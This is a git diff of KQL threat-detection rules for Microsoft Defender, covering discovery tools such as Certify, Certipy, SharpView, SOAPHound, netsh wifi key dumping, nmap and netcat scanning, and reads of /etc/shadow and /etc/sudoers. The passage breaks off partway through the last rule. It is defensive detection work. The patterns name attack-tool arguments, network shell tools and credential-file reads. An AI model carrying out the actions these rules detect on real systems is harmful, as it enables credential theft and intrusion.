a/KQL/rules/Discovery/hacktool_certify_execution.kql +++ b/KQL/rules/Discovery/hacktool_certify_execution.kql @@ -1,10 +1,10 @@ -// Title: HackTool - Certify Execution -// Author: pH-T (Nextron Systems) -// Date: 2023-04-17 -// Level: high -// Description: Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.credential-access, attack.t1649 - -DeviceProcessEvents +// Title: HackTool - Certify Execution +// Author: pH-T (Nextron Systems) +// Date: 2023-04-17 +// Level: high +// Description: Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.credential-access, attack.t1649 + +DeviceProcessEvents | where (FolderPath endswith "\\Certify.exe" or ProcessVersionInfoOriginalFileName =~ "Certify.exe" or ProcessVersionInfoFileDescription contains "Certify") or ((ProcessCommandLine contains ".exe cas " or ProcessCommandLine contains ".exe find " or ProcessCommandLine contains ".exe pkiobjects " or ProcessCommandLine contains ".exe request " or ProcessCommandLine contains ".exe download ") and (ProcessCommandLine contains " /vulnerable" or ProcessCommandLine contains " /template:" or ProcessCommandLine contains " /altname:" or ProcessCommandLine contains " /domain:" or ProcessCommandLine contains " /path:" or ProcessCommandLine contains " /ca:")) \ No newline at end of file diff --git a/KQL/rules/Discovery/hacktool_certipy_execution.kql b/KQL/rules/Discovery/hacktool_certipy_execution.kql index 64a183b5..36cbf366 100644 --- a/KQL/rules/Discovery/hacktool_certipy_execution.kql +++ b/KQL/rules/Discovery/hacktool_certipy_execution.kql @@ -1,12 +1,12 @@ -// Title: HackTool - Certipy Execution -// Author: pH-T (Nextron Systems), Sittikorn Sangrattanapitak -// Date: 2023-04-17 -// Level: high -// Description: Detects Certipy execution, a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.credential-access, attack.t1649 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: HackTool - Certipy Execution +// Author: pH-T (Nextron Systems), Sittikorn Sangrattanapitak +// Date: 2023-04-17 +// Level: high +// Description: Detects Certipy execution, a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.credential-access, attack.t1649 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (FolderPath endswith "\\Certipy.exe" or ProcessVersionInfoOriginalFileName =~ "Certipy.exe" or ProcessVersionInfoFileDescription contains "Certipy") or ((ProcessCommandLine contains " account " or ProcessCommandLine contains " auth " or ProcessCommandLine contains " cert " or ProcessCommandLine contains " find " or ProcessCommandLine contains " forge " or ProcessCommandLine contains " ptt " or ProcessCommandLine contains " relay " or ProcessCommandLine contains " req " or ProcessCommandLine contains " shadow " or ProcessCommandLine contains " template ") and (ProcessCommandLine contains " -bloodhound" or ProcessCommandLine contains " -ca-pfx " or ProcessCommandLine contains " -dc-ip " or ProcessCommandLine contains " -kirbi" or ProcessCommandLine contains " -old-bloodhound" or ProcessCommandLine contains " -pfx " or ProcessCommandLine contains " -target" or ProcessCommandLine contains " -template" or ProcessCommandLine contains " -username " or ProcessCommandLine contains " -vulnerable" or ProcessCommandLine contains "auth -pfx" or ProcessCommandLine contains "shadow auto" or ProcessCommandLine contains "shadow list")) \ No newline at end of file diff --git a/KQL/rules/Discovery/hacktool_sharpldapmonitor_execution.kql b/KQL/rules/Discovery/hacktool_sharpldapmonitor_execution.kql index 426d1dbd..23bd8274 100644 --- a/KQL/rules/Discovery/hacktool_sharpldapmonitor_execution.kql +++ b/KQL/rules/Discovery/hacktool_sharpldapmonitor_execution.kql @@ -1,10 +1,10 @@ -// Title: HackTool - SharpLDAPmonitor Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-12-30 -// Level: medium -// Description: Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects. -// MITRE Tactic: Discovery -// Tags: attack.discovery - -DeviceProcessEvents +// Title: HackTool - SharpLDAPmonitor Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-30 +// Level: medium +// Description: Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects. +// MITRE Tactic: Discovery +// Tags: attack.discovery + +DeviceProcessEvents | where (ProcessCommandLine contains "/user:" and ProcessCommandLine contains "/pass:" and ProcessCommandLine contains "/dcip:") or (FolderPath endswith "\\SharpLDAPmonitor.exe" or ProcessVersionInfoOriginalFileName =~ "SharpLDAPmonitor.exe") \ No newline at end of file diff --git a/KQL/rules/Discovery/hacktool_sharpldapwhoami_execution.kql b/KQL/rules/Discovery/hacktool_sharpldapwhoami_execution.kql index 692e24e8..c1d91ab5 100644 --- a/KQL/rules/Discovery/hacktool_sharpldapwhoami_execution.kql +++ b/KQL/rules/Discovery/hacktool_sharpldapwhoami_execution.kql @@ -1,12 +1,12 @@ -// Title: HackTool - SharpLdapWhoami Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2022-08-29 -// Level: high -// Description: Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1033, car.2016-03-001 -// False Positives: -// - Programs that use the same command line flags - -DeviceProcessEvents +// Title: HackTool - SharpLdapWhoami Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-08-29 +// Level: high +// Description: Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1033, car.2016-03-001 +// False Positives: +// - Programs that use the same command line flags + +DeviceProcessEvents | where (ProcessCommandLine endswith " /method:ntlm" or ProcessCommandLine endswith " /method:kerb" or ProcessCommandLine endswith " /method:nego" or ProcessCommandLine endswith " /m:nego" or ProcessCommandLine endswith " /m:ntlm" or ProcessCommandLine endswith " /m:kerb") or FolderPath endswith "\\SharpLdapWhoami.exe" or (ProcessVersionInfoOriginalFileName contains "SharpLdapWhoami" or ProcessVersionInfoProductName =~ "SharpLdapWhoami") \ No newline at end of file diff --git a/KQL/rules/Discovery/hacktool_sharpview_execution.kql b/KQL/rules/Discovery/hacktool_sharpview_execution.kql index 7e30744c..200d5400 100644 --- a/KQL/rules/Discovery/hacktool_sharpview_execution.kql +++ b/KQL/rules/Discovery/hacktool_sharpview_execution.kql @@ -1,10 +1,10 @@ -// Title: HackTool - SharpView Execution -// Author: frack113 -// Date: 2021-12-10 -// Level: high -// Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1049, attack.t1069.002, attack.t1482, attack.t1135, attack.t1033 - -DeviceProcessEvents +// Title: HackTool - SharpView Execution +// Author: frack113 +// Date: 2021-12-10 +// Level: high +// Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1049, attack.t1069.002, attack.t1482, attack.t1135, attack.t1033 + +DeviceProcessEvents | where ProcessVersionInfoOriginalFileName =~ "SharpView.exe" or FolderPath endswith "\\SharpView.exe" or (ProcessCommandLine contains "Add-RemoteConnection" or ProcessCommandLine contains "Convert-ADName" or ProcessCommandLine contains "ConvertFrom-SID" or ProcessCommandLine contains "ConvertFrom-UACValue" or ProcessCommandLine contains "Convert-SidToName" or ProcessCommandLine contains "Export-PowerViewCSV" or ProcessCommandLine contains "Find-DomainObjectPropertyOutlier" or ProcessCommandLine contains "Find-DomainProcess" or ProcessCommandLine contains "Find-DomainShare" or ProcessCommandLine contains "Find-DomainUserEvent" or ProcessCommandLine contains "Find-DomainUserLocation" or ProcessCommandLine contains "Find-ForeignGroup" or ProcessCommandLine contains "Find-ForeignUser" or ProcessCommandLine contains "Find-GPOComputerAdmin" or ProcessCommandLine contains "Find-GPOLocation" or ProcessCommandLine contains "Find-Interesting" or ProcessCommandLine contains "Find-LocalAdminAccess" or ProcessCommandLine contains "Find-ManagedSecurityGroups" or ProcessCommandLine contains "Get-CachedRDPConnection" or ProcessCommandLine contains "Get-DFSshare" or ProcessCommandLine contains "Get-DomainComputer" or ProcessCommandLine contains "Get-DomainController" or ProcessCommandLine contains "Get-DomainDFSShare" or ProcessCommandLine contains "Get-DomainDNSRecord" or ProcessCommandLine contains "Get-DomainFileServer" or ProcessCommandLine contains "Get-DomainForeign" or ProcessCommandLine contains "Get-DomainGPO" or ProcessCommandLine contains "Get-DomainGroup" or ProcessCommandLine contains "Get-DomainGUIDMap" or ProcessCommandLine contains "Get-DomainManagedSecurityGroup" or ProcessCommandLine contains "Get-DomainObject" or ProcessCommandLine contains "Get-DomainOU" or ProcessCommandLine contains "Get-DomainPolicy" or ProcessCommandLine contains "Get-DomainSID" or ProcessCommandLine contains "Get-DomainSite" or ProcessCommandLine contains "Get-DomainSPNTicket" or ProcessCommandLine contains "Get-DomainSubnet" or ProcessCommandLine contains "Get-DomainTrust" or ProcessCommandLine contains "Get-DomainUserEvent" or ProcessCommandLine contains "Get-ForestDomain" or ProcessCommandLine contains "Get-ForestGlobalCatalog" or ProcessCommandLine contains "Get-ForestTrust" or ProcessCommandLine contains "Get-GptTmpl" or ProcessCommandLine contains "Get-GroupsXML" or ProcessCommandLine contains "Get-LastLoggedOn" or ProcessCommandLine contains "Get-LoggedOnLocal" or ProcessCommandLine contains "Get-NetComputer" or ProcessCommandLine contains "Get-NetDomain" or ProcessCommandLine contains "Get-NetFileServer" or ProcessCommandLine contains "Get-NetForest" or ProcessCommandLine contains "Get-NetGPO" or ProcessCommandLine contains "Get-NetGroupMember" or ProcessCommandLine contains "Get-NetLocalGroup" or ProcessCommandLine contains "Get-NetLoggedon" or ProcessCommandLine contains "Get-NetOU" or ProcessCommandLine contains "Get-NetProcess" or ProcessCommandLine contains "Get-NetRDPSession" or ProcessCommandLine contains "Get-NetSession" or ProcessCommandLine contains "Get-NetShare" or ProcessCommandLine contains "Get-NetSite" or ProcessCommandLine contains "Get-NetSubnet" or ProcessCommandLine contains "Get-NetUser" or ProcessCommandLine contains "Get-PathAcl" or ProcessCommandLine contains "Get-PrincipalContext" or ProcessCommandLine contains "Get-RegistryMountedDrive" or ProcessCommandLine contains "Get-RegLoggedOn" or ProcessCommandLine contains "Get-WMIRegCachedRDPConnection" or ProcessCommandLine contains "Get-WMIRegLastLoggedOn" or ProcessCommandLine contains "Get-WMIRegMountedDrive" or ProcessCommandLine contains "Get-WMIRegProxy" or ProcessCommandLine contains "Invoke-ACLScanner" or ProcessCommandLine contains "Invoke-CheckLocalAdminAccess" or ProcessCommandLine contains "Invoke-Kerberoast" or ProcessCommandLine contains "Invoke-MapDomainTrust" or ProcessCommandLine contains "Invoke-RevertToSelf" or ProcessCommandLine contains "Invoke-Sharefinder" or ProcessCommandLine contains "Invoke-UserImpersonation" or ProcessCommandLine contains "Remove-DomainObjectAcl" or ProcessCommandLine contains "Remove-RemoteConnection" or ProcessCommandLine contains "Request-SPNTicket" or ProcessCommandLine contains "Set-DomainObject" or ProcessCommandLine contains "Test-AdminAccess") \ No newline at end of file diff --git a/KQL/rules/Discovery/hacktool_soaphound_execution.kql b/KQL/rules/Discovery/hacktool_soaphound_execution.kql index a3e8f54f..f6ad57ad 100644 --- a/KQL/rules/Discovery/hacktool_soaphound_execution.kql +++ b/KQL/rules/Discovery/hacktool_soaphound_execution.kql @@ -1,10 +1,10 @@ -// Title: HackTool - SOAPHound Execution -// Author: @kostastsale -// Date: 2024-01-26 -// Level: high -// Description: Detects the execution of SOAPHound, a .NET tool for collecting Active Directory data, using specific command-line arguments that may indicate an attempt to extract sensitive AD information. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1087 - -DeviceProcessEvents +// Title: HackTool - SOAPHound Execution +// Author: @kostastsale +// Date: 2024-01-26 +// Level: high +// Description: Detects the execution of SOAPHound, a .NET tool for collecting Active Directory data, using specific command-line arguments that may indicate an attempt to extract sensitive AD information. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1087 + +DeviceProcessEvents | where (ProcessCommandLine contains " --buildcache " or ProcessCommandLine contains " --bhdump " or ProcessCommandLine contains " --certdump " or ProcessCommandLine contains " --dnsdump ") and (ProcessCommandLine contains " -c " or ProcessCommandLine contains " --cachefilename " or ProcessCommandLine contains " -o " or ProcessCommandLine contains " --outputdirectory") \ No newline at end of file diff --git a/KQL/rules/Discovery/hacktool_trufflesnout_execution.kql b/KQL/rules/Discovery/hacktool_trufflesnout_execution.kql index 8d00d224..3daaec2e 100644 --- a/KQL/rules/Discovery/hacktool_trufflesnout_execution.kql +++ b/KQL/rules/Discovery/hacktool_trufflesnout_execution.kql @@ -1,10 +1,10 @@ -// Title: HackTool - TruffleSnout Execution -// Author: frack113 -// Date: 2022-08-20 -// Level: high -// Description: Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1482 - -DeviceProcessEvents +// Title: HackTool - TruffleSnout Execution +// Author: frack113 +// Date: 2022-08-20 +// Level: high +// Description: Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1482 + +DeviceProcessEvents | where ProcessVersionInfoOriginalFileName =~ "TruffleSnout.exe" or FolderPath endswith "\\TruffleSnout.exe" \ No newline at end of file diff --git a/KQL/rules/Discovery/harvesting_of_wifi_credentials_via_netsh_exe.kql b/KQL/rules/Discovery/harvesting_of_wifi_credentials_via_netsh_exe.kql index 25d15566..404ff7a2 100644 --- a/KQL/rules/Discovery/harvesting_of_wifi_credentials_via_netsh_exe.kql +++ b/KQL/rules/Discovery/harvesting_of_wifi_credentials_via_netsh_exe.kql @@ -1,10 +1,10 @@ -// Title: Harvesting Of Wifi Credentials Via Netsh.EXE -// Author: Andreas Hunkeler (@Karneades), oscd.community -// Date: 2020-04-20 -// Level: medium -// Description: Detect the harvesting of wifi credentials using netsh.exe -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.credential-access, attack.t1040 - -DeviceProcessEvents +// Title: Harvesting Of Wifi Credentials Via Netsh.EXE +// Author: Andreas Hunkeler (@Karneades), oscd.community +// Date: 2020-04-20 +// Level: medium +// Description: Detect the harvesting of wifi credentials using netsh.exe +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.credential-access, attack.t1040 + +DeviceProcessEvents | where (ProcessCommandLine contains "wlan" and ProcessCommandLine contains " s" and ProcessCommandLine contains " p" and ProcessCommandLine contains " k" and ProcessCommandLine contains "=clear") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") \ No newline at end of file diff --git a/KQL/rules/Discovery/linux_network_service_scanning_tools_execution.kql b/KQL/rules/Discovery/linux_network_service_scanning_tools_execution.kql index 0dd0897b..5862f1fe 100644 --- a/KQL/rules/Discovery/linux_network_service_scanning_tools_execution.kql +++ b/KQL/rules/Discovery/linux_network_service_scanning_tools_execution.kql @@ -1,12 +1,12 @@ -// Title: Linux Network Service Scanning Tools Execution -// Author: Alejandro Ortuno, oscd.community, Georg Lauenstein (sure[secure]) -// Date: 2020-10-21 -// Level: low -// Description: Detects execution of network scanning and reconnaisance tools. These tools can be used for the enumeration of local or remote network services for example. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1046 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: Linux Network Service Scanning Tools Execution +// Author: Alejandro Ortuno, oscd.community, Georg Lauenstein (sure[secure]) +// Date: 2020-10-21 +// Level: low +// Description: Detects execution of network scanning and reconnaisance tools. These tools can be used for the enumeration of local or remote network services for example. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1046 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where ((FolderPath endswith "/nc" or FolderPath endswith "/ncat" or FolderPath endswith "/netcat" or FolderPath endswith "/socat") and (not((ProcessCommandLine contains " --listen " or ProcessCommandLine contains " -l ")))) or (FolderPath endswith "/autorecon" or FolderPath endswith "/hping" or FolderPath endswith "/hping2" or FolderPath endswith "/hping3" or FolderPath endswith "/naabu" or FolderPath endswith "/nmap" or FolderPath endswith "/nping" or FolderPath endswith "/telnet" or FolderPath endswith "/zenmap") \ No newline at end of file diff --git a/KQL/rules/Discovery/linux_remote_system_discovery.kql b/KQL/rules/Discovery/linux_remote_system_discovery.kql index c993b989..512b68b4 100644 --- a/KQL/rules/Discovery/linux_remote_system_discovery.kql +++ b/KQL/rules/Discovery/linux_remote_system_discovery.kql @@ -1,12 +1,12 @@ -// Title: Linux Remote System Discovery -// Author: Alejandro Ortuno, oscd.community -// Date: 2020-10-22 -// Level: low -// Description: Detects the enumeration of other remote systems. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1018 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: Linux Remote System Discovery +// Author: Alejandro Ortuno, oscd.community +// Date: 2020-10-22 +// Level: low +// Description: Detects the enumeration of other remote systems. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1018 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where (ProcessCommandLine contains "-a" and FolderPath endswith "/arp") or ((ProcessCommandLine contains " 10." or ProcessCommandLine contains " 192.168." or ProcessCommandLine contains " 172.16." or ProcessCommandLine contains " 172.17." or ProcessCommandLine contains " 172.18." or ProcessCommandLine contains " 172.19." or ProcessCommandLine contains " 172.20." or ProcessCommandLine contains " 172.21." or ProcessCommandLine contains " 172.22." or ProcessCommandLine contains " 172.23." or ProcessCommandLine contains " 172.24." or ProcessCommandLine contains " 172.25." or ProcessCommandLine contains " 172.26." or ProcessCommandLine contains " 172.27." or ProcessCommandLine contains " 172.28." or ProcessCommandLine contains " 172.29." or ProcessCommandLine contains " 172.30." or ProcessCommandLine contains " 172.31." or ProcessCommandLine contains " 127." or ProcessCommandLine contains " 169.254.") and FolderPath endswith "/ping") \ No newline at end of file diff --git a/KQL/rules/Discovery/local_accounts_discovery.kql b/KQL/rules/Discovery/local_accounts_discovery.kql index 5eedc70d..fed49bcc 100644 --- a/KQL/rules/Discovery/local_accounts_discovery.kql +++ b/KQL/rules/Discovery/local_accounts_discovery.kql @@ -1,12 +1,12 @@ -// Title: Local Accounts Discovery -// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community -// Date: 2019-10-21 -// Level: low -// Description: Local accounts, System Owner/User discovery using operating systems utilities -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1033, attack.t1087.001 -// False Positives: -// - Legitimate administrator or user enumerates local users for legitimate reason - -DeviceProcessEvents +// Title: Local Accounts Discovery +// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community +// Date: 2019-10-21 +// Level: low +// Description: Local accounts, System Owner/User discovery using operating systems utilities +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1033, attack.t1087.001 +// False Positives: +// - Legitimate administrator or user enumerates local users for legitimate reason + +DeviceProcessEvents | where (((ProcessCommandLine contains " /c" and ProcessCommandLine contains "dir " and ProcessCommandLine contains "\\Users\\") and FolderPath endswith "\\cmd.exe") and (not(ProcessCommandLine contains " rmdir "))) or ((ProcessCommandLine contains "user" and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")) and (not((ProcessCommandLine contains "/domain" or ProcessCommandLine contains "/add" or ProcessCommandLine contains "/delete" or ProcessCommandLine contains "/active" or ProcessCommandLine contains "/expires" or ProcessCommandLine contains "/passwordreq" or ProcessCommandLine contains "/scriptpath" or ProcessCommandLine contains "/times" or ProcessCommandLine contains "/workstations")))) or ((ProcessCommandLine contains " /l" and FolderPath endswith "\\cmdkey.exe") or ((FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\quser.exe" or FolderPath endswith "\\qwinsta.exe") or (ProcessVersionInfoOriginalFileName in~ ("whoami.exe", "quser.exe", "qwinsta.exe"))) or ((ProcessCommandLine contains "useraccount" and ProcessCommandLine contains "get") and FolderPath endswith "\\wmic.exe")) \ No newline at end of file diff --git a/KQL/rules/Discovery/local_groups_discovery_linux.kql b/KQL/rules/Discovery/local_groups_discovery_linux.kql index 36d18147..ee1f4093 100644 --- a/KQL/rules/Discovery/local_groups_discovery_linux.kql +++ b/KQL/rules/Discovery/local_groups_discovery_linux.kql @@ -1,12 +1,12 @@ -// Title: Local Groups Discovery - Linux -// Author: Ömer Günal, Alejandro Ortuno, oscd.community -// Date: 2020-10-11 -// Level: low -// Description: Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1069.001 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: Local Groups Discovery - Linux +// Author: Ömer Günal, Alejandro Ortuno, oscd.community +// Date: 2020-10-11 +// Level: low +// Description: Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1069.001 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where FolderPath endswith "/groups" or (ProcessCommandLine contains "/etc/group" and (FolderPath endswith "/cat" or FolderPath endswith "/ed" or FolderPath endswith "/head" or FolderPath endswith "/less" or FolderPath endswith "/more" or FolderPath endswith "/nano" or FolderPath endswith "/tail" or FolderPath endswith "/vi" or FolderPath endswith "/vim")) \ No newline at end of file diff --git a/KQL/rules/Discovery/local_groups_discovery_macos.kql b/KQL/rules/Discovery/local_groups_discovery_macos.kql index 164d2d7c..22b775cc 100644 --- a/KQL/rules/Discovery/local_groups_discovery_macos.kql +++ b/KQL/rules/Discovery/local_groups_discovery_macos.kql @@ -1,12 +1,12 @@ -// Title: Local Groups Discovery - MacOs -// Author: Ömer Günal, Alejandro Ortuno, oscd.community -// Date: 2020-10-11 -// Level: informational -// Description: Detects enumeration of local system groups -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1069.001 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: Local Groups Discovery - MacOs +// Author: Ömer Günal, Alejandro Ortuno, oscd.community +// Date: 2020-10-11 +// Level: informational +// Description: Detects enumeration of local system groups +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1069.001 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where ((ProcessCommandLine contains "-q" and ProcessCommandLine contains "group") and FolderPath endswith "/dscacheutil") or (ProcessCommandLine contains "/etc/group" and FolderPath endswith "/cat") or ((ProcessCommandLine contains "-list" and ProcessCommandLine contains "/groups") and FolderPath endswith "/dscl") \ No newline at end of file diff --git a/KQL/rules/Discovery/local_groups_reconnaissance_via_wmic_exe.kql b/KQL/rules/Discovery/local_groups_reconnaissance_via_wmic_exe.kql index bb4a6fe7..f663ee48 100644 --- a/KQL/rules/Discovery/local_groups_reconnaissance_via_wmic_exe.kql +++ b/KQL/rules/Discovery/local_groups_reconnaissance_via_wmic_exe.kql @@ -1,13 +1,13 @@ -// Title: Local Groups Reconnaissance Via Wmic.EXE -// Author: frack113 -// Date: 2021-12-12 -// Level: low -// Description: Detects the execution of "wmic" with the "group" flag. -// Adversaries may attempt to find local system groups and permission settings. -// The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. -// Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1069.001 - -DeviceProcessEvents +// Title: Local Groups Reconnaissance Via Wmic.EXE +// Author: frack113 +// Date: 2021-12-12 +// Level: low +// Description: Detects the execution of "wmic" with the "group" flag. +// Adversaries may attempt to find local system groups and permission settings. +// The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. +// Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1069.001 + +DeviceProcessEvents | where ProcessCommandLine contains " group" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/KQL/rules/Discovery/local_system_accounts_discovery_linux.kql b/KQL/rules/Discovery/local_system_accounts_discovery_linux.kql index fd3026f9..64673cf3 100644 --- a/KQL/rules/Discovery/local_system_accounts_discovery_linux.kql +++ b/KQL/rules/Discovery/local_system_accounts_discovery_linux.kql @@ -1,12 +1,12 @@ -// Title: Local System Accounts Discovery - Linux -// Author: Alejandro Ortuno, oscd.community, CheraghiMilad -// Date: 2020-10-08 -// Level: low -// Description: Detects enumeration of local systeam accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1087.001 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: Local System Accounts Discovery - Linux +// Author: Alejandro Ortuno, oscd.community, CheraghiMilad +// Date: 2020-10-08 +// Level: low +// Description: Detects enumeration of local systeam accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1087.001 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where FolderPath endswith "/lastlog" or ProcessCommandLine contains "'x:0:'" or ((ProcessCommandLine contains "/etc/passwd" or ProcessCommandLine contains "/etc/shadow" or ProcessCommandLine contains "/etc/sudoers" or ProcessCommandLine contains "/etc/spwd.db" or ProcessCommandLine contains "/etc/pwd.db" or ProcessCommandLine contains "/etc/master.passwd") and (FolderPath endswith "/cat" or FolderPath endswith "/ed" or FolderPath endswith "/head" or FolderPath endswith "/more" or FolderPath endswith "/nano" or FolderPath endswith "/tail" or FolderPath endswith "/vi" or FolderPath endswith "/vim" or FolderPath endswith "/less" or FolderPath endswith "/emacs" or FolderPath endswith "/sqlite3" or FolderPath endswith "/makemap")) or FolderPath endswith "/id" or (ProcessCommandLine contains "-u" and FolderPath endswith "/lsof") \ No newline at end of file diff --git a/KQL/rules/Discovery/local_system_accounts_discovery_macos.kql b/KQL/rules/Discovery/local_system_accounts_discovery_macos.kql index e2ff4f81..f1d6c836 100644 --- a/KQL/rules/Discovery/local_system_accounts_discovery_macos.kql +++ b/KQL/rules/Discovery/local_system_accounts_discovery_macos.kql @@ -1,12 +1,12 @@ -// Title: Local System Accounts Discovery - MacOs -// Author: Alejandro Ortuno, oscd.community -// Date: 2020-10-08 -// Level: low -// Description: Detects enumeration of local systeam accounts on MacOS -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1087.001 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: Local System Accounts Discovery - MacOs +// Author: Alejandro Ortuno, oscd.community +// Date: 2020-10-08 +// Level: low +// Description: Detects enumeration of local systeam accounts on MacOS +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1087.001 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where ((ProcessCommandLine contains "list" and ProcessCommandLine contains "/users") and FolderPath endswith "/dscl") or ((ProcessCommandLine contains "-q" and ProcessCommandLine contains "user") and FolderPath endswith "/dscacheutil") or ProcessCommandLine contains "'x:0:'" or ((ProcessCommandLine contains "/etc/passwd" or ProcessCommandLine contains "/etc/sudoers") and FolderPath endswith "/cat") or FolderPath endswith "/id" or (ProcessCommandLine contains "-u" and FolderPath endswith "/lsof") \ No newline at end of file diff --git a/KQL/rules/Discovery/macos_network_service_scanning.kql b/KQL/rules/Discovery/macos_network_service_scanning.kql index 24d422e1..aa75713e 100644 --- a/KQL/rules/Discovery/macos_network_service_scanning.kql +++ b/KQL/rules/Discovery/macos_network_service_scanning.kql @@ -1,12 +1,12 @@ -// Title: MacOS Network Service Scanning -// Author: Alejandro Ortuno, oscd.community -// Date: 2020-10-21 -// Level: low -// Description: Detects enumeration of local or remote network services. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1046 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: MacOS Network Service Scanning +// Author: Alejandro Ortuno, oscd.community +// Date: 2020-10-21 +// Level: low +// Description: Detects enumeration of local or remote network services. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1046 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where ((FolderPath endswith "/nc" or FolderPath endswith "/netcat") and (not(ProcessCommandLine contains "l"))) or (FolderPath endswith "/nmap" or FolderPath endswith "/telnet") \ No newline at end of file diff --git a/KQL/rules/Discovery/macos_remote_system_discovery.kql b/KQL/rules/Discovery/macos_remote_system_discovery.kql index 375cf900..12724578 100644 --- a/KQL/rules/Discovery/macos_remote_system_discovery.kql +++ b/KQL/rules/Discovery/macos_remote_system_discovery.kql @@ -1,12 +1,12 @@ -// Title: Macos Remote System Discovery -// Author: Alejandro Ortuno, oscd.community -// Date: 2020-10-22 -// Level: informational -// Description: Detects the enumeration of other remote systems. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1018 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: Macos Remote System Discovery +// Author: Alejandro Ortuno, oscd.community +// Date: 2020-10-22 +// Level: informational +// Description: Detects the enumeration of other remote systems. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1018 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where (ProcessCommandLine contains "-a" and FolderPath endswith "/arp") or ((ProcessCommandLine contains " 10." or ProcessCommandLine contains " 192.168." or ProcessCommandLine contains " 172.16." or ProcessCommandLine contains " 172.17." or ProcessCommandLine contains " 172.18." or ProcessCommandLine contains " 172.19." or ProcessCommandLine contains " 172.20." or ProcessCommandLine contains " 172.21." or ProcessCommandLine contains " 172.22." or ProcessCommandLine contains " 172.23." or 